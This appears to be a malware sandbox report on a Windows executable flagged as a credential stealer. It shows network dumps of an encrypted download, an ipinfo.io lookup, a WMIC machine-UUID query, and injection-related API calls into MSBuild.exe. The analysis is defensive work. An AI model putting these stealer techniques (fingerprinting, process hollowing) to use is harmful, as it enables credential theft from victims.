                          Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                          2024-07-27 09:37:20 UTC1369INData Raw: a9 17 4c 6c fb 4c ae 05 ce da 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c ba 7c 1e 1a 90 24 ea 9b 5a d2 4c ea e1 27 61 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 21 4c 7e a5 26 72 23 4c 59 ac bc 89 ae 05 90 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 05 0e 6a 81 b2 b4 d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 7f 1d 38 f0 0f 2d ab 59 8a 60 4c 59 0a ac 9c e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c
                          Data Ascii: LlLL~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+Ll|$ZL'a7L+LlfLLY!L~&r#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYjL)L~KLLY8-Y`LYLxLY2L+LlcLLYL~LLYJL+'L
                          2024-07-27 09:37:20 UTC1369INData Raw: 86 4c ae 79 3a 4d c2 4c 7e da 4c ea 4f 10 e6 3f 4c 2b 0e 05 90 41 b0 b4 1f 30 95 d1 74 f0 b9 10 66 1a fd 68 e8 37 e2 aa 7e 9c 05 59 8a 06 d5 d0 b9 f6 72 4d 4c ea 97 4c 59 28 6f d9 56 7e 9c b7 c0 14 7f 47 41 7d 4c 7e d1 4c ea 38 eb 1d a0 29 fd 63 22 e5 59 66 a2 df 4c 59 23 4c 7e 9b 6d 5a 3c c3 b5 c2 47 d2 a1 7e 9c dd 4c ae 80 4c 59 ef c9 8a 84 cc 2a bc 3a 4d d6 9a 0d 30 47 d1 77 0b d8 26 15 11 c0 eb 78 c0 a6 f0 02 49 ad 37 b7 22 f6 7c 9e 6b 4c ae 26 ee b9 e4 74 f0 b4 5a 4e 81 f5 b2 ca 91 e5 2f 4c 6c d7 4c ae 7a eb 1d 48 e0 66 e4 17 42 69 f5 b2 25 91 e5 b3 4c 6c 3c 4c ae 05 eb 1d 6c 7a ea d8 21 c6 65 c4 c2 49 d7 c1 60 66 e3 d8 d3 06 fb fd 68 69 b7 30 1e 4c ea ad e4 a1 67 14 01 34 5d bc 06 73 36 9f f5 b2 42 e0 66 42 4c ea ad 4c 59 a3 38 6d a8 fb 78 8a 66 a2
                          Data Ascii: Ly:ML~LO?L+A0tfh7~YrMLLY(oV~GA}L~L8)c"YfLY#L~mZ<G~LLY*:M0Gw&xI7"|kL&tZN/LlLzHfBi%Ll<Llz!eI`fhi0Lg4]s6BfBLLY8mxf
                          2024-07-27 09:37:20 UTC1369INData Raw: 54 50 2b 4c 7e 43 5a 4e 0d a9 5c 60 4c 2b 07 31 77 32 cd 2f a0 d1 65 97 4c 7e 20 36 a2 94 4c 59 d8 4c 2b b5 4c 6c bb 7c 1e 64 4c 59 7f 4c 7e 5c a1 06 7c 4c 59 27 1f 3a 50 10 c5 5b 66 a2 dc 4c 59 a4 2a ba 5c 7b ae 2b 54 50 4e 4c 2b 97 a9 a8 da 48 9b 82 4c 59 86 63 e4 c5 8e 6b be 3a 4d d2 4c 2b d4 c2 17 80 4c ae 6a 4c 59 74 4c 7e 26 10 66 76 4c 59 39 4c 2b 68 66 e3 68 4c ae c7 5e c8 a3 f3 b7 3e 21 c6 0d 4c 59 e1 1a cd 68 4b 18 32 e9 2a 1f 2f 7a 86 7a ea 62 21 c6 d9 15 11 33 d7 c1 41 6e 4d b6 c6 12 61 4c 59 59 fc cc 95 7d 8a 74 54 50 6f b2 55 0e a9 a8 b3 9d bf 3a 7c a8 29 f6 72 1d 4c ea a3 49 ad 28 7e 49 2f a2 65 da 4c ae 67 1f 89 a8 88 cb 41 4c ea 50 97 92 25 8e e8 6e 7e 9c 35 4c ae 15 e0 04 7d f6 72 e9 4c ea 73 4c 59 b8 1a cd c2 4c 6c 4d 4c ae 5c 10 e6 0b
                          Data Ascii: TP+L~CZN\`L+1w2/eL~ 6LYL+Ll|dLYL~\|LY':P[fLY*\{+TPNL+HLYck:ML+LjLYtL~&fvLY9L+hfhL^>!LYhK2*/zzb!3AnMaLYY}tTPoU:|)rLI(~I/eLgALP%n~5L}rLsLYLlML\
                          2024-07-27 09:37:20 UTC741INData Raw: f0 82 87 12 b7 fd 68 89 5d 79 88 66 e3 f4 80 54 cd f5 b2 ee 5d 6c d0 4c ea 7e 4c 59 71 38 6d cf 4c 6c d5 ed 0f 39 49 ad 89 91 44 e2 80 36 21 4c 59 4d 4c 2b 64 4b 18 e2 b0 b4 b1 ee b9 97 72 77 46 4c ea 33 10 e6 23 6f d9 9d 0a 59 82 4c ae 69 4c 59 76 4c 7e d4 23 c5 16 6e 38 3b 4c 2b c4 4c 6c 5e 59 8a d5 4c 59 0d 4c 7e 31 4c ea 0e 4d 58 47 4c 2b 2e 4c 6c d6 4c ae 7a ea 1c 91 4c 7e 49 4c ea 93 4c 59 a8 38 6d be e4 60 3d 4c ae 63 4c 59 7f eb 78 e5 4c ea 7b 4c 59 30 4c 2b ca 4c 6c 61 4c ae db 4c 59 07 4c 7e 8b 6b 7e 04 4c 59 48 4c 2b 25 4c 6c e9 bc 9e 34 4c 59 af 4c 7e 43 4c ea 9a cb 6e d8 a3 07 9d 4c 6c 37 4c ae 4a ab 5e 7f f6 72 eb 4c ea 70 4c 59 39 9a 0d c1 4c 6c 4f 4c ae d0 4c 59 08 4c 7e 14 4c ea 0a 4c 59 42 4c 2b f7 31 77 11 cd 2f ee 1a fe a4 4c 7e 75 11
                          Data Ascii: h]yfT]lL~LYq8mLl9ID6!LYML+dKrwFL3#oYLiLYvL~#n8;L+Ll^YLYL~1LMXGL+.LlLzL~ILLY8m`=LcLYxL{LY0L+LlaLLYL~k~LYHL+%Ll4LYL~CLnLl7LJ^rLpLY9LlOLLYL~LLYBL+1w/L~u
                          2024-07-27 09:37:20 UTC1369INData Raw: 4d 83 1f 3a 40 a5 23 c3 4c ae 2a 4c 59 70 c9 8a b2 97 c0 eb e0 04 65 26 31 87 4c 6c 28 4c ae ba d1 65 85 16 00 76 da cc 69 cb 6e f5 ef 19 be 9c 7d 01 18 cb 7e 4c 59 d0 4c 7e be 7b ae b6 7a 0f 3c 1f 3a 6a f1 f5 7c 4c ae 21 4c 59 5e c9 8a 37 1e fb db ac f8 71 4c 2b 88 4c 6c 46 0b d8 98 4d 58 97 9e ef 5e 4c ea 45 4c 59 3b 6f d9 41 fa 79 8b 9d bf 75 4c 59 ee 4c 7e 31 6d 5a 50 d5 d0 2a d1 a6 dc 4c 6c 76 4c ae 4b eb 1d 24 7b eb 38 1e fb 33 4c 59 5f 4c 2b b2 7e 9c fb b8 bb 70 7e aa 49 4c 7e 55 4c ea 7b ee b9 21 3d 0a 5e 1a 48 98 62 a7 3d 89 2c d3 eb 78 b0 47 90 be 05 02 29 cf aa 25 7e 9c 79 4c ae 04 4c 59 8b 9b 5a 32 1e fb 76 92 26 54 4c 2b 3d 4c 6c 43 0b d8 be 9c 4a 2d 06 13 44 a6 f0 40 4c 59 fc 4c 2b 6d e4 60 26 87 53 76 cb 6e ec eb 78 d4 ed d8 79 5e c8 d5 69
                          Data Ascii: M:@#L*LYpe&1Ll(Levin}~LYL~{z<:j|L!LY^7qL+LlFMX^LELY;oAyuLYL~1mZP*LlvLK${83LY_L+~p~IL~UL{!=^Hb=,xG)%~yLLYZ2v&TL+=LlCJ-D@LYL+m`&Svnxy^i
                          2024-07-27 09:37:20 UTC1369INData Raw: 31 fa 79 75 32 77 95 4c 59 4e 4c 7e d2 6d 5a a0 d5 d0 c8 d1 a6 6c 4c 6c 96 4c ae 3b eb 1d c7 7b eb 57 66 30 d1 4c 59 af 4c 2b 12 7e 9c 45 a5 60 77 1a fe 97 91 44 a0 38 ef 3b 4c 59 73 4c 2b 7e 4b 18 c4 8a 59 ef eb 1d 69 f6 72 5d 4c ea 47 4c 59 de 0a 1e 33 59 0b 99 4c ae 77 4c 59 0f 3d 4e 22 3f cb fb 3a 4d ad b7 22 94 84 11 10 fb fb 1e 9c 4a f0 8c ff 4b 6d 5a 30 4c 59 5c 4c 2b a5 1a 48 dc 9d bf de 92 26 4b 4c 7e 57 4c ea fc eb 1d 11 dd fa 32 95 01 88 b0 b4 78 4c 59 e7 4c 7e 04 21 c6 69 71 d4 ad 9a 0d f3 2b 6b 58 be 9c d5 5e c8 ca d8 18 a0 4c ea 1e 4c 59 11 38 6d e9 58 0a ca 87 53 b1 25 62 46 eb 78 6a ed d8 93 5e c8 6b 69 be 63 4c 6c ac 4c ae 15 eb 1d 9c d9 19 e5 1e fb 6f 0a ec a1 4c 2b db 4c 6c 16 0b d8 db 5e c8 fd 00 d7 8e 4c ea 15 4c 59 2f 38 6d 35 4d 6d
                          Data Ascii: 1yu2wLYNL~mZlLlL;{Wf0LYL+~E`wD8;LYsL+~KYir]LGLY3YLwLY=N"?:M"JKmZ0LY\L+H&KL~WL2xLYL~!iq+kX^LLY8mXS%bFxj^kicLlLoL+Ll^LLY/8m5Mm
                          2024-07-27 09:37:20 UTC1369INData Raw: b8 bb b6 71 d4 d1 4c 7e 0b 4c ea 20 ee b9 9d 3d 0a 05 1a 48 c0 62 a7 c5 6b df 3c eb 78 70 aa bc 91 c2 b4 70 4c 2b 89 4c 6c a0 ce 2c aa 2f 7a 86 8c ff ef 6d 5a 44 4c 59 0a 4c 2b 71 1a 48 8a 9d bf 89 92 26 ef 4c 7e 00 4c ea aa eb 1d b5 dd fa 46 95 01 6c b0 b4 0e 4c 59 30 4c 7e 90 21 c6 dd 71 d4 79 9a 0d 84 2b 6b fc be 9c 83 5e c8 2d d8 18 54 4c ea 4a 4c 59 b5 38 6d 1f 58 0a 2d 87 53 c5 25 62 09 24 60 de ed d8 77 5e c8 df 69 be d7 4c 6c 78 4c ae 41 eb 1d c8 d9 19 33 1e fb 30 54 50 55 4c 2b 3c 4c 6c 42 0b d8 3c 5e c8 63 2f 5f 5a 4c ea 41 4c 59 bb 38 6d 61 4d 6d 27 87 53 71 4c 59 ea 4c 7e 15 6d 5a 7c da 7c 0e d1 a6 d8 4c 6c 72 4c ae 3b ee b9 df b3 f7 94 c0 77 17 4c 59 5b 4c 2b 72 4b 18 df b8 bb 2a 71 d4 bd 4c 7e 51 4c ea 5f ee b9 d2 0a 1e 3f 3f dd a5 4c ae 5f
                          Data Ascii: qL~L =Hbk<xppL+Ll,/zmZDLYL+qH&L~LFlLY0L~!qy+k^-TLJLY8mX-S%b$`w^iLlxLA30TPUL+<LlB<^c/_ZLALY8maMm'SqLYL~mZ||LlrL;wLY[L+rK*qL~QL_??L_
                          2024-07-27 09:37:20 UTC1369INData Raw: d8 a4 e0 66 a4 4c ea 3a 4c 59 7e a3 07 1a 9c 7d 6e 27 e3 9a 4c 59 44 4c 7e 1a 7b ae 87 cc d8 39 6f d9 67 4c 6c 98 4c ae e2 3a 4d 7d 9e ef 4d 61 84 ee 4c 59 a5 4c 2b 98 4b 18 65 9d bf 8c 8c 98 32 4c 7e aa 4c ea 55 eb 1d 4c 1f 3a 4d 27 a1 0e 4c ae 91 4c 59 fe c9 8a 57 4d eb 5c 5b bc 03 4c 2b 68 4c 6c 62 7c 1e 6c da 7c 00 fa 6b fe 4c ea e5 4c 59 4b 6f d9 5d 22 e5 0c d8 0b 07 4c 59 1d 4c 7e c5 7b ae 2a da 7c e2 cb dc 3e 4c 6c 05 4c ae 4f ee b9 94 7b eb c0 c0 77 43 4c 59 ff 4c 2b c2 7e 9c 9c 6d 8f c7 3a 4d e4 72 77 96 af 9b ec cb 6e 21 cf aa 29 7e 9c 71 4c ae 08 4c 59 83 9b 5a 1e 1e fb 7a 92 26 58 4c 2b 35 4c 6c bf 0b d8 b6 9c 4a 25 06 13 48 a6 f0 bc 4c 59 f4 4c 2b 65 e4 60 2a 87 53 7a cb 6e e4 eb 78 d8 ed d8 71 5e c8 d9 69 be d1 4c 6c 5f 4c ae b6 eb 1d 7f d9
                          Data Ascii: fL:LY~}n'LYDL~{9ogLlL:M}MaLYL+Ke2L~LUL:M'LLYWM\[L+hLlb|l|kLLYKo]"LYL~{*|>LlLO{wCLYL+~m:Mrwn!)~qLLYZz&XL+5LlJ%HLYL+e`*Sznxq^iLl_L
                          2024-07-27 09:37:20 UTC1369INData Raw: 5e 4c ea 45 4c 59 bf 38 6d 5e 93 47 00 14 c1 6f c4 c2 ee 4c 7e 01 4c ea d5 d1 65 2a d1 a6 fa 2b 6b c1 6b a8 ff 2f 7a 20 9e ef df 28 3c 33 4c 59 5f 4c 2b 76 4b 18 5a 19 ca 82 5e c8 14 a1 24 55 4c ea 4b 4c 59 b4 38 6d bb 9c 7d 20 3d 5f 7b 4c 59 e5 4c 7e bb 7b ae e6 4d 58 5d e9 7c d6 4c 6c 79 4c ae 34 ee b9 2a 7b eb 56 a8 bf 1c 4c 59 54 4c 2b 9d 7e 9c cc a2 67 25 71 d4 43 4c 7e 5b 4c ea f4 eb 1d d9 0a 1e d4 9b 89 af 4c ae 70 4c 59 08 3d 4e c8 a1 06 46 b7 f2 49 47 d2 ec 0a 59 73 4c ae 0a 4c 59 50 c9 8a 0b b8 2f 66 6f 39 5a 4c 2b 37 4c 6c 08 4c ae 83 da 7c c5 35 b3 50 4c ea be 4c 59 15 6f d9 6e 6e 4d b0 59 8a 73 54 50 8f d7 83 ad 09 9c f1 9c 4a 0c cf aa 20 7e 9c 5c 4c ae 01 4c 59 3e 9b 5a 17 1e fb 73 92 26 51 4c 2b 38 4c 6c b6 0b d8 bb 9c 4a 28 06 13 41 a6 f0
                          Data Ascii: ^LELY8m^GoL~Le*+kk/z (<3LY_L+vKZ^$ULKLY8m} =_{LYL~{MX]|LlyL4*{VLYTL+~g%qCL~[LLpLY=NFIGYsLLYP/fo9ZL+7LlL|5PLLYonnMYsTPJ ~\LLY>Zs&QL+8LlJ(A


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.84970934.117.59.814435992C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          TimestampBytes transferredDirectionData
                          2024-07-27 09:37:21 UTC63OUTGET /json HTTP/1.1
                          Host: ipinfo.io
                          Connection: Keep-Alive
                          2024-07-27 09:37:22 UTC345INHTTP/1.1 200 OK
                          access-control-allow-origin: *
                          Content-Length: 319
                          content-type: application/json; charset=utf-8
                          date: Sat, 27 Jul 2024 09:37:22 GMT
                          x-content-type-options: nosniff
                          via: 1.1 google
                          strict-transport-security: max-age=2592000; includeSubDomains
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close
                          2024-07-27 09:37:22 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                          Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:05:37:15
                          Start date:27/07/2024
                          Path:C:\Users\user\Desktop\Ycj3d5NMhc.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\Ycj3d5NMhc.exe"
                          Imagebase:0x3a0000
                          File size:294'400 bytes
                          MD5 hash:10DA3CC4689926DE08A0BA47481ACEAD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:05:37:19
                          Start date:27/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x610000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:05:37:21
                          Start date:27/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:05:37:21
                          Start date:27/07/2024
                          Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                          Wow64 process (32bit):true
                          Commandline:"wmic" csproduct get UUID
                          Imagebase:0x7e0000
                          File size:427'008 bytes
                          MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:6
                          Start time:05:37:21
                          Start date:27/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:25.1%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:12.5%
                            Total number of Nodes:24
                            Total number of Limit Nodes:0

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: FileInternetRead
                            • String ID:
                            • API String ID: 778332206-0
                            • Opcode ID: 67516623db0b8f420f5ed767b8fcebd8a9c231da7b1354a906ea337bc3f59f97
                            • Instruction ID: 2d63e23c2c3abef1eb0b38db3ecf656cad38b587d9bc0a5f0f5e7caf70d59d44
                            • Opcode Fuzzy Hash: 67516623db0b8f420f5ed767b8fcebd8a9c231da7b1354a906ea337bc3f59f97
                            • Instruction Fuzzy Hash: 7E615970908A5C8FDB58DF68C885BE9BBF0FB29315F1041AED449E3651DB70A985CF81

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: InternetOpen
                            • String ID:
                            • API String ID: 2038078732-0
                            • Opcode ID: d1a526d5ef9fcd985a8a0d6242f12847966277c9a4a4eec3ef1d2552924aa9df
                            • Instruction ID: 1b1766e41f69b103da5fcd4eb6b01009cc6b269c0fc413a9abd3d2c541453b9f
                            • Opcode Fuzzy Hash: d1a526d5ef9fcd985a8a0d6242f12847966277c9a4a4eec3ef1d2552924aa9df
                            • Instruction Fuzzy Hash: 07812670908A5C8FDB98EF58C854BE9BBF1FB69311F1041AED04EE3661DB75A981CB40

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: InternetOpen
                            • String ID:
                            • API String ID: 2038078732-0
                            • Opcode ID: 55dcb8e2da87c868de65190bd72a89af1af100bfbd968f58083d4e5476448ca6
                            • Instruction ID: 71e95909ed2cb73d59f875974847d257e827610b52745456d5e2c308886d8d1b
                            • Opcode Fuzzy Hash: 55dcb8e2da87c868de65190bd72a89af1af100bfbd968f58083d4e5476448ca6
                            • Instruction Fuzzy Hash: C5712470908A5C8FDB98EF58C894BE9BBF1FB69311F1041AED00EE3651DB74A980CB41

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 15f70c079488e5c45eaa27e674e9c704dc252886e2e4f79f206d174d82c56a47
                            • Instruction ID: c751c4564c45d29350d3a960be5ed7c5e4719e74fc54a285a40c11dbfb5d552e
                            • Opcode Fuzzy Hash: 15f70c079488e5c45eaa27e674e9c704dc252886e2e4f79f206d174d82c56a47
                            • Instruction Fuzzy Hash: 31613870908A1C8FDB94DF68C885BE9BBF1FB69311F1082AAD44DE3251CB34A985CF40

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 9583adb02a8e8d960d308cc515620b18a776092c454a052705d3a06079523417
                            • Instruction ID: a3c826657169050649c2ac030d073d695aaab16eb503a293b970861481fc7a68
                            • Opcode Fuzzy Hash: 9583adb02a8e8d960d308cc515620b18a776092c454a052705d3a06079523417
                            • Instruction Fuzzy Hash: EB511770908A5C8FDF94DF68C885BE9BBF1FB69311F1082AAD44DE3251DB74A985CB40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 7ffb4b055fa8-7ffb4b0560d9 VirtualAllocEx 64 7ffb4b0560e1-7ffb4b05614d 60->64 65 7ffb4b0560db 60->65 65->64
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: d4e107e4e90d559bc53b9fe943d5894de2ad846854a7f7964d9b60dd9e0b4147
                            • Instruction ID: 689280cf3d1cffc32f461907772313ce604131cd94344404e5838b3a78e21acb
                            • Opcode Fuzzy Hash: d4e107e4e90d559bc53b9fe943d5894de2ad846854a7f7964d9b60dd9e0b4147
                            • Instruction Fuzzy Hash: 6D51F870908A1C8FDF94EF58C885BE9BBF1FB69311F1091AAD44DE3255CB71A9858F80

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 6147f995227a8ebb0046ce519cd4ec8cac657f2483a448626223bdc8e7ab729e
                            • Instruction ID: 2293013d69c7e178284c92188bd939045f7be0826b56237b8be3d45abe2ce003
                            • Opcode Fuzzy Hash: 6147f995227a8ebb0046ce519cd4ec8cac657f2483a448626223bdc8e7ab729e
                            • Instruction Fuzzy Hash: 9A511670908A1C8FDB94EFA8C849BEDBBF1FB59311F10826AD449E3255DB749885CF40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 7ffb4b055e49-7ffb4b055e55 79 7ffb4b055e60-7ffb4b055f30 ResumeThread 78->79 80 7ffb4b055e57-7ffb4b055e5f 78->80 85 7ffb4b055f32 79->85 86 7ffb4b055f38-7ffb4b055f82 79->86 80->79 85->86
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1491528320.00007FFB4B050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B050000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4b050000_Ycj3d5NMhc.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 8a9aeaaff5359c2d471f13a941d7f7eb11ea0acd3ba2729e31346308bb5617fb
                            • Instruction ID: e6e411f3ab568b12fabf9fcc177e6f2be2e3a3faac2f831db472c5ed1d755fa5
                            • Opcode Fuzzy Hash: 8a9aeaaff5359c2d471f13a941d7f7eb11ea0acd3ba2729e31346308bb5617fb
                            • Instruction Fuzzy Hash: D2418970D0874C8FDB59EFA8D885AEDBBF0FF56310F1081AAD449E7652DA34A486CB41

                            Execution Graph

                            Execution Coverage:20.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:25.8%
                            Total number of Nodes:295
                            Total number of Limit Nodes:33
                            execution_graph 37528 ebd4e8 37529 ebd4ff 37528->37529 37532 ebb8b0 37529->37532 37533 ebb8ca 37532->37533 37534 ebb8cf KiUserExceptionDispatcher 37532->37534 37533->37534 37535 ebb910 37534->37535 37536 ebb906 37534->37536 37539 ebd0f9 37535->37539 37543 ebd108 37535->37543 37540 ebd12c 37539->37540 37541 ebd198 LdrInitializeThunk 37540->37541 37542 ebd1c6 37541->37542 37544 ebd12c 37543->37544 37545 ebd198 LdrInitializeThunk 37544->37545 37546 ebd1c6 37545->37546 37571 ebc038 37572 ebc05c 37571->37572 37573 ebc0c8 LdrInitializeThunk 37572->37573 37574 ebc0f6 37573->37574 37582 eb32c8 37583 eb32ec 37582->37583 37584 eb3301 37583->37584 37588 eb4868 37583->37588 37595 eb4857 37583->37595 37602 eb3330 37583->37602 37589 eb4895 37588->37589 37590 eb48f4 37589->37590 37612 eb946b 37589->37612 37617 eb8ff7 37589->37617 37622 eb93e1 37589->37622 37627 eb941a 37589->37627 37596 eb4895 37595->37596 37597 eb48f4 37596->37597 37598 eb946b 13 API calls 37596->37598 37599 eb941a 13 API calls 37596->37599 37600 eb93e1 13 API calls 37596->37600 37601 eb8ff7 13 API calls 37596->37601 37598->37597 37599->37597 37600->37597 37601->37597 37603 eb335d 37602->37603 37754 eb9bd8 37603->37754 37759 eb9af6 37603->37759 37764 eb9ab7 37603->37764 37769 eb9c42 37603->37769 37774 eb9782 37603->37774 37779 eb9b6e 37603->37779 37784 eb9b2f 37603->37784 37604 eb3432 37604->37584 37614 eb9187 37612->37614 37613 eb95db 37613->37613 37614->37613 37632 eba830 37614->37632 37637 eba840 37614->37637 37618 eb9035 37617->37618 37619 eb95db 37618->37619 37620 eba840 13 API calls 